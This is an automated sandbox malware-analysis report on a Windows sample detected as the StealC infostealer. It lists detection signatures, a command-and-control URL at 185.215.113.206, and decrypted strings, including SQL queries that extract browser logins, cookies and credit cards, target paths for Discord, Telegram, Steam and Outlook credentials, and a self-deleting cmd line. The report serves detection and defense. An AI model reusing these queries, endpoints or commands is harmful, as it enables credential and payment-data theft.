Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1546478
MD5:43deae52c429449144c488c4ea074c14
SHA1:2496e112cf08e1584a15d65409d84936f3c8b7f9
SHA256:bd4beff45c77e1045bd78a72e0dbd8700f18d088a57ce444eb2b8a5422035bbf
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 4024 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 43DEAE52C429449144C488C4EA074C14)
  • cleanup

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2089126694.0000000005020000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2132664415.000000000140E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 4024JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 4024JoeSecurity_StealcYara detected StealcJoe Security
              Click to see the 1 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.680000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-01T00:38:04.204405+010020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.20680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.680000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 0.2.file.exe.680000.0.unpackString decryptor: INSERT_KEY_HERE
                Source: 0.2.file.exe.680000.0.unpackString decryptor: 30
                Source: 0.2.file.exe.680000.0.unpackString decryptor: 11
                Source: 0.2.file.exe.680000.0.unpackString decryptor: 20
                Source: 0.2.file.exe.680000.0.unpackString decryptor: 24
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GetProcAddress
                Source: 0.2.file.exe.680000.0.unpackString decryptor: LoadLibraryA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: lstrcatA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: OpenEventA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: CreateEventA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: CloseHandle
                Source: 0.2.file.exe.680000.0.unpackString decryptor: Sleep
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GetUserDefaultLangID
                Source: 0.2.file.exe.680000.0.unpackString decryptor: VirtualAllocExNuma
                Source: 0.2.file.exe.680000.0.unpackString decryptor: VirtualFree
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GetSystemInfo
                Source: 0.2.file.exe.680000.0.unpackString decryptor: VirtualAlloc
                Source: 0.2.file.exe.680000.0.unpackString decryptor: HeapAlloc
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GetComputerNameA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: lstrcpyA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GetProcessHeap
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GetCurrentProcess
                Source: 0.2.file.exe.680000.0.unpackString decryptor: lstrlenA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: ExitProcess
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GlobalMemoryStatusEx
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GetSystemTime
                Source: 0.2.file.exe.680000.0.unpackString decryptor: SystemTimeToFileTime
                Source: 0.2.file.exe.680000.0.unpackString decryptor: advapi32.dll
                Source: 0.2.file.exe.680000.0.unpackString decryptor: gdi32.dll
                Source: 0.2.file.exe.680000.0.unpackString decryptor: user32.dll
                Source: 0.2.file.exe.680000.0.unpackString decryptor: crypt32.dll
                Source: 0.2.file.exe.680000.0.unpackString decryptor: ntdll.dll
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GetUserNameA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: CreateDCA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GetDeviceCaps
                Source: 0.2.file.exe.680000.0.unpackString decryptor: ReleaseDC
                Source: 0.2.file.exe.680000.0.unpackString decryptor: CryptStringToBinaryA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: sscanf
                Source: 0.2.file.exe.680000.0.unpackString decryptor: VMwareVMware
                Source: 0.2.file.exe.680000.0.unpackString decryptor: HAL9TH
                Source: 0.2.file.exe.680000.0.unpackString decryptor: JohnDoe
                Source: 0.2.file.exe.680000.0.unpackString decryptor: DISPLAY
                Source: 0.2.file.exe.680000.0.unpackString decryptor: %hu/%hu/%hu
                Source: 0.2.file.exe.680000.0.unpackString decryptor: http://185.215.113.206
                Source: 0.2.file.exe.680000.0.unpackString decryptor: bksvnsj
                Source: 0.2.file.exe.680000.0.unpackString decryptor: /6c4adf523b719729.php
                Source: 0.2.file.exe.680000.0.unpackString decryptor: /746f34465cf17784/
                Source: 0.2.file.exe.680000.0.unpackString decryptor: tale
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GetEnvironmentVariableA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GetFileAttributesA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GlobalLock
                Source: 0.2.file.exe.680000.0.unpackString decryptor: HeapFree
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GetFileSize
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GlobalSize
                Source: 0.2.file.exe.680000.0.unpackString decryptor: CreateToolhelp32Snapshot
                Source: 0.2.file.exe.680000.0.unpackString decryptor: IsWow64Process
                Source: 0.2.file.exe.680000.0.unpackString decryptor: Process32Next
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GetLocalTime
                Source: 0.2.file.exe.680000.0.unpackString decryptor: FreeLibrary
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GetTimeZoneInformation
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GetSystemPowerStatus
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GetVolumeInformationA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GetWindowsDirectoryA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: Process32First
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GetLocaleInfoA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GetUserDefaultLocaleName
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GetModuleFileNameA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: DeleteFileA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: FindNextFileA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: LocalFree
                Source: 0.2.file.exe.680000.0.unpackString decryptor: FindClose
                Source: 0.2.file.exe.680000.0.unpackString decryptor: SetEnvironmentVariableA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: LocalAlloc
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GetFileSizeEx
                Source: 0.2.file.exe.680000.0.unpackString decryptor: ReadFile
                Source: 0.2.file.exe.680000.0.unpackString decryptor: SetFilePointer
                Source: 0.2.file.exe.680000.0.unpackString decryptor: WriteFile
                Source: 0.2.file.exe.680000.0.unpackString decryptor: CreateFileA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: FindFirstFileA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: CopyFileA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: VirtualProtect
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GetLogicalProcessorInformationEx
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GetLastError
                Source: 0.2.file.exe.680000.0.unpackString decryptor: lstrcpynA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: MultiByteToWideChar
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GlobalFree
                Source: 0.2.file.exe.680000.0.unpackString decryptor: WideCharToMultiByte
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GlobalAlloc
                Source: 0.2.file.exe.680000.0.unpackString decryptor: OpenProcess
                Source: 0.2.file.exe.680000.0.unpackString decryptor: TerminateProcess
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GetCurrentProcessId
                Source: 0.2.file.exe.680000.0.unpackString decryptor: gdiplus.dll
                Source: 0.2.file.exe.680000.0.unpackString decryptor: ole32.dll
                Source: 0.2.file.exe.680000.0.unpackString decryptor: bcrypt.dll
                Source: 0.2.file.exe.680000.0.unpackString decryptor: wininet.dll
                Source: 0.2.file.exe.680000.0.unpackString decryptor: shlwapi.dll
                Source: 0.2.file.exe.680000.0.unpackString decryptor: shell32.dll
                Source: 0.2.file.exe.680000.0.unpackString decryptor: psapi.dll
                Source: 0.2.file.exe.680000.0.unpackString decryptor: rstrtmgr.dll
                Source: 0.2.file.exe.680000.0.unpackString decryptor: CreateCompatibleBitmap
                Source: 0.2.file.exe.680000.0.unpackString decryptor: SelectObject
                Source: 0.2.file.exe.680000.0.unpackString decryptor: BitBlt
                Source: 0.2.file.exe.680000.0.unpackString decryptor: DeleteObject
                Source: 0.2.file.exe.680000.0.unpackString decryptor: CreateCompatibleDC
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GdipGetImageEncodersSize
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GdipGetImageEncoders
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GdiplusStartup
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GdiplusShutdown
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GdipSaveImageToStream
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GdipDisposeImage
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GdipFree
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GetHGlobalFromStream
                Source: 0.2.file.exe.680000.0.unpackString decryptor: CreateStreamOnHGlobal
                Source: 0.2.file.exe.680000.0.unpackString decryptor: CoUninitialize
                Source: 0.2.file.exe.680000.0.unpackString decryptor: CoInitialize
                Source: 0.2.file.exe.680000.0.unpackString decryptor: CoCreateInstance
                Source: 0.2.file.exe.680000.0.unpackString decryptor: BCryptGenerateSymmetricKey
                Source: 0.2.file.exe.680000.0.unpackString decryptor: BCryptCloseAlgorithmProvider
                Source: 0.2.file.exe.680000.0.unpackString decryptor: BCryptDecrypt
                Source: 0.2.file.exe.680000.0.unpackString decryptor: BCryptSetProperty
                Source: 0.2.file.exe.680000.0.unpackString decryptor: BCryptDestroyKey
                Source: 0.2.file.exe.680000.0.unpackString decryptor: BCryptOpenAlgorithmProvider
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GetWindowRect
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GetDesktopWindow
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GetDC
                Source: 0.2.file.exe.680000.0.unpackString decryptor: CloseWindow
                Source: 0.2.file.exe.680000.0.unpackString decryptor: wsprintfA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: EnumDisplayDevicesA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GetKeyboardLayoutList
                Source: 0.2.file.exe.680000.0.unpackString decryptor: CharToOemW
                Source: 0.2.file.exe.680000.0.unpackString decryptor: wsprintfW
                Source: 0.2.file.exe.680000.0.unpackString decryptor: RegQueryValueExA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: RegEnumKeyExA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: RegOpenKeyExA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: RegCloseKey
                Source: 0.2.file.exe.680000.0.unpackString decryptor: RegEnumValueA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: CryptBinaryToStringA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: CryptUnprotectData
                Source: 0.2.file.exe.680000.0.unpackString decryptor: SHGetFolderPathA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: ShellExecuteExA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: InternetOpenUrlA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: InternetConnectA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: InternetCloseHandle
                Source: 0.2.file.exe.680000.0.unpackString decryptor: InternetOpenA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: HttpSendRequestA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: HttpOpenRequestA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: InternetReadFile
                Source: 0.2.file.exe.680000.0.unpackString decryptor: InternetCrackUrlA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: StrCmpCA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: StrStrA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: StrCmpCW
                Source: 0.2.file.exe.680000.0.unpackString decryptor: PathMatchSpecA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: GetModuleFileNameExA
                Source: 0.2.file.exe.680000.0.unpackString decryptor: RmStartSession
                Source: 0.2.file.exe.680000.0.unpackString decryptor: RmRegisterResources
                Source: 0.2.file.exe.680000.0.unpackString decryptor: RmGetList
                Source: 0.2.file.exe.680000.0.unpackString decryptor: RmEndSession
                Source: 0.2.file.exe.680000.0.unpackString decryptor: sqlite3_open
                Source: 0.2.file.exe.680000.0.unpackString decryptor: sqlite3_prepare_v2
                Source: 0.2.file.exe.680000.0.unpackString decryptor: sqlite3_step
                Source: 0.2.file.exe.680000.0.unpackString decryptor: sqlite3_column_text
                Source: 0.2.file.exe.680000.0.unpackString decryptor: sqlite3_finalize
                Source: 0.2.file.exe.680000.0.unpackString decryptor: sqlite3_close
                Source: 0.2.file.exe.680000.0.unpackString decryptor: sqlite3_column_bytes
                Source: 0.2.file.exe.680000.0.unpackString decryptor: sqlite3_column_blob
                Source: 0.2.file.exe.680000.0.unpackString decryptor: encrypted_key
                Source: 0.2.file.exe.680000.0.unpackString decryptor: PATH
                Source: 0.2.file.exe.680000.0.unpackString decryptor: C:\ProgramData\nss3.dll
                Source: 0.2.file.exe.680000.0.unpackString decryptor: NSS_Init
                Source: 0.2.file.exe.680000.0.unpackString decryptor: NSS_Shutdown
                Source: 0.2.file.exe.680000.0.unpackString decryptor: PK11_GetInternalKeySlot
                Source: 0.2.file.exe.680000.0.unpackString decryptor: PK11_FreeSlot
                Source: 0.2.file.exe.680000.0.unpackString decryptor: PK11_Authenticate
                Source: 0.2.file.exe.680000.0.unpackString decryptor: PK11SDR_Decrypt
                Source: 0.2.file.exe.680000.0.unpackString decryptor: C:\ProgramData\
                Source: 0.2.file.exe.680000.0.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                Source: 0.2.file.exe.680000.0.unpackString decryptor: browser:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: profile:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: url:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: login:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: password:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: Opera
                Source: 0.2.file.exe.680000.0.unpackString decryptor: OperaGX
                Source: 0.2.file.exe.680000.0.unpackString decryptor: Network
                Source: 0.2.file.exe.680000.0.unpackString decryptor: cookies
                Source: 0.2.file.exe.680000.0.unpackString decryptor: .txt
                Source: 0.2.file.exe.680000.0.unpackString decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
                Source: 0.2.file.exe.680000.0.unpackString decryptor: TRUE
                Source: 0.2.file.exe.680000.0.unpackString decryptor: FALSE
                Source: 0.2.file.exe.680000.0.unpackString decryptor: autofill
                Source: 0.2.file.exe.680000.0.unpackString decryptor: SELECT name, value FROM autofill
                Source: 0.2.file.exe.680000.0.unpackString decryptor: history
                Source: 0.2.file.exe.680000.0.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                Source: 0.2.file.exe.680000.0.unpackString decryptor: cc
                Source: 0.2.file.exe.680000.0.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                Source: 0.2.file.exe.680000.0.unpackString decryptor: name:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: month:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: year:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: card:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: Cookies
                Source: 0.2.file.exe.680000.0.unpackString decryptor: Login Data
                Source: 0.2.file.exe.680000.0.unpackString decryptor: Web Data
                Source: 0.2.file.exe.680000.0.unpackString decryptor: History
                Source: 0.2.file.exe.680000.0.unpackString decryptor: logins.json
                Source: 0.2.file.exe.680000.0.unpackString decryptor: formSubmitURL
                Source: 0.2.file.exe.680000.0.unpackString decryptor: usernameField
                Source: 0.2.file.exe.680000.0.unpackString decryptor: encryptedUsername
                Source: 0.2.file.exe.680000.0.unpackString decryptor: encryptedPassword
                Source: 0.2.file.exe.680000.0.unpackString decryptor: guid
                Source: 0.2.file.exe.680000.0.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                Source: 0.2.file.exe.680000.0.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                Source: 0.2.file.exe.680000.0.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                Source: 0.2.file.exe.680000.0.unpackString decryptor: cookies.sqlite
                Source: 0.2.file.exe.680000.0.unpackString decryptor: formhistory.sqlite
                Source: 0.2.file.exe.680000.0.unpackString decryptor: places.sqlite
                Source: 0.2.file.exe.680000.0.unpackString decryptor: plugins
                Source: 0.2.file.exe.680000.0.unpackString decryptor: Local Extension Settings
                Source: 0.2.file.exe.680000.0.unpackString decryptor: Sync Extension Settings
                Source: 0.2.file.exe.680000.0.unpackString decryptor: IndexedDB
                Source: 0.2.file.exe.680000.0.unpackString decryptor: Opera Stable
                Source: 0.2.file.exe.680000.0.unpackString decryptor: Opera GX Stable
                Source: 0.2.file.exe.680000.0.unpackString decryptor: CURRENT
                Source: 0.2.file.exe.680000.0.unpackString decryptor: chrome-extension_
                Source: 0.2.file.exe.680000.0.unpackString decryptor: _0.indexeddb.leveldb
                Source: 0.2.file.exe.680000.0.unpackString decryptor: Local State
                Source: 0.2.file.exe.680000.0.unpackString decryptor: profiles.ini
                Source: 0.2.file.exe.680000.0.unpackString decryptor: chrome
                Source: 0.2.file.exe.680000.0.unpackString decryptor: opera
                Source: 0.2.file.exe.680000.0.unpackString decryptor: firefox
                Source: 0.2.file.exe.680000.0.unpackString decryptor: wallets
                Source: 0.2.file.exe.680000.0.unpackString decryptor: %08lX%04lX%lu
                Source: 0.2.file.exe.680000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                Source: 0.2.file.exe.680000.0.unpackString decryptor: ProductName
                Source: 0.2.file.exe.680000.0.unpackString decryptor: x32
                Source: 0.2.file.exe.680000.0.unpackString decryptor: x64
                Source: 0.2.file.exe.680000.0.unpackString decryptor: %d/%d/%d %d:%d:%d
                Source: 0.2.file.exe.680000.0.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: 0.2.file.exe.680000.0.unpackString decryptor: ProcessorNameString
                Source: 0.2.file.exe.680000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                Source: 0.2.file.exe.680000.0.unpackString decryptor: DisplayName
                Source: 0.2.file.exe.680000.0.unpackString decryptor: DisplayVersion
                Source: 0.2.file.exe.680000.0.unpackString decryptor: Network Info:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: - IP: IP?
                Source: 0.2.file.exe.680000.0.unpackString decryptor: - Country: ISO?
                Source: 0.2.file.exe.680000.0.unpackString decryptor: System Summary:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: - HWID:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: - OS:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: - Architecture:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: - UserName:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: - Computer Name:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: - Local Time:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: - UTC:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: - Language:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: - Keyboards:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: - Laptop:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: - Running Path:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: - CPU:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: - Threads:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: - Cores:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: - RAM:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: - Display Resolution:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: - GPU:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: User Agents:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: Installed Apps:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: All Users:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: Current User:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: Process List:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: system_info.txt
                Source: 0.2.file.exe.680000.0.unpackString decryptor: freebl3.dll
                Source: 0.2.file.exe.680000.0.unpackString decryptor: mozglue.dll
                Source: 0.2.file.exe.680000.0.unpackString decryptor: msvcp140.dll
                Source: 0.2.file.exe.680000.0.unpackString decryptor: nss3.dll
                Source: 0.2.file.exe.680000.0.unpackString decryptor: softokn3.dll
                Source: 0.2.file.exe.680000.0.unpackString decryptor: vcruntime140.dll
                Source: 0.2.file.exe.680000.0.unpackString decryptor: \Temp\
                Source: 0.2.file.exe.680000.0.unpackString decryptor: .exe
                Source: 0.2.file.exe.680000.0.unpackString decryptor: runas
                Source: 0.2.file.exe.680000.0.unpackString decryptor: open
                Source: 0.2.file.exe.680000.0.unpackString decryptor: /c start
                Source: 0.2.file.exe.680000.0.unpackString decryptor: %DESKTOP%
                Source: 0.2.file.exe.680000.0.unpackString decryptor: %APPDATA%
                Source: 0.2.file.exe.680000.0.unpackString decryptor: %LOCALAPPDATA%
                Source: 0.2.file.exe.680000.0.unpackString decryptor: %USERPROFILE%
                Source: 0.2.file.exe.680000.0.unpackString decryptor: %DOCUMENTS%
                Source: 0.2.file.exe.680000.0.unpackString decryptor: %PROGRAMFILES%
                Source: 0.2.file.exe.680000.0.unpackString decryptor: %PROGRAMFILES_86%
                Source: 0.2.file.exe.680000.0.unpackString decryptor: %RECENT%
                Source: 0.2.file.exe.680000.0.unpackString decryptor: *.lnk
                Source: 0.2.file.exe.680000.0.unpackString decryptor: files
                Source: 0.2.file.exe.680000.0.unpackString decryptor: \discord\
                Source: 0.2.file.exe.680000.0.unpackString decryptor: \Local Storage\leveldb\CURRENT
                Source: 0.2.file.exe.680000.0.unpackString decryptor: \Local Storage\leveldb
                Source: 0.2.file.exe.680000.0.unpackString decryptor: \Telegram Desktop\
                Source: 0.2.file.exe.680000.0.unpackString decryptor: key_datas
                Source: 0.2.file.exe.680000.0.unpackString decryptor: D877F783D5D3EF8C*
                Source: 0.2.file.exe.680000.0.unpackString decryptor: map*
                Source: 0.2.file.exe.680000.0.unpackString decryptor: A7FDF864FBC10B77*
                Source: 0.2.file.exe.680000.0.unpackString decryptor: A92DAA6EA6F891F2*
                Source: 0.2.file.exe.680000.0.unpackString decryptor: F8806DD0C461824F*
                Source: 0.2.file.exe.680000.0.unpackString decryptor: Telegram
                Source: 0.2.file.exe.680000.0.unpackString decryptor: Tox
                Source: 0.2.file.exe.680000.0.unpackString decryptor: *.tox
                Source: 0.2.file.exe.680000.0.unpackString decryptor: *.ini
                Source: 0.2.file.exe.680000.0.unpackString decryptor: Password
                Source: 0.2.file.exe.680000.0.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.680000.0.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.680000.0.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.680000.0.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.680000.0.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.680000.0.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.680000.0.unpackString decryptor: 00000001
                Source: 0.2.file.exe.680000.0.unpackString decryptor: 00000002
                Source: 0.2.file.exe.680000.0.unpackString decryptor: 00000003
                Source: 0.2.file.exe.680000.0.unpackString decryptor: 00000004
                Source: 0.2.file.exe.680000.0.unpackString decryptor: \Outlook\accounts.txt
                Source: 0.2.file.exe.680000.0.unpackString decryptor: Pidgin
                Source: 0.2.file.exe.680000.0.unpackString decryptor: \.purple\
                Source: 0.2.file.exe.680000.0.unpackString decryptor: accounts.xml
                Source: 0.2.file.exe.680000.0.unpackString decryptor: dQw4w9WgXcQ
                Source: 0.2.file.exe.680000.0.unpackString decryptor: token:
                Source: 0.2.file.exe.680000.0.unpackString decryptor: Software\Valve\Steam
                Source: 0.2.file.exe.680000.0.unpackString decryptor: SteamPath
                Source: 0.2.file.exe.680000.0.unpackString decryptor: \config\
                Source: 0.2.file.exe.680000.0.unpackString decryptor: ssfn*
                Source: 0.2.file.exe.680000.0.unpackString decryptor: config.vdf
                Source: 0.2.file.exe.680000.0.unpackString decryptor: DialogConfig.vdf
                Source: 0.2.file.exe.680000.0.unpackString decryptor: DialogConfigOverlay*.vdf
                Source: 0.2.file.exe.680000.0.unpackString decryptor: libraryfolders.vdf
                Source: 0.2.file.exe.680000.0.unpackString decryptor: loginusers.vdf
                Source: 0.2.file.exe.680000.0.unpackString decryptor: \Steam\
                Source: 0.2.file.exe.680000.0.unpackString decryptor: sqlite3.dll
                Source: 0.2.file.exe.680000.0.unpackString decryptor: browsers
                Source: 0.2.file.exe.680000.0.unpackString decryptor: done
                Source: 0.2.file.exe.680000.0.unpackString decryptor: soft
                Source: 0.2.file.exe.680000.0.unpackString decryptor: \Discord\tokens.txt
                Source: 0.2.file.exe.680000.0.unpackString decryptor: /c timeout /t 5 & del /f /q "
                Source: 0.2.file.exe.680000.0.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                Source: 0.2.file.exe.680000.0.unpackString decryptor: C:\Windows\system32\cmd.exe
                Source: 0.2.file.exe.680000.0.unpackString decryptor: https
                Source: 0.2.file.exe.680000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                Source: 0.2.file.exe.680000.0.unpackString decryptor: POST
                Source: 0.2.file.exe.680000.0.unpackString decryptor: HTTP/1.1
                Source: 0.2.file.exe.680000.0.unpackString decryptor: Content-Disposition: form-data; name="
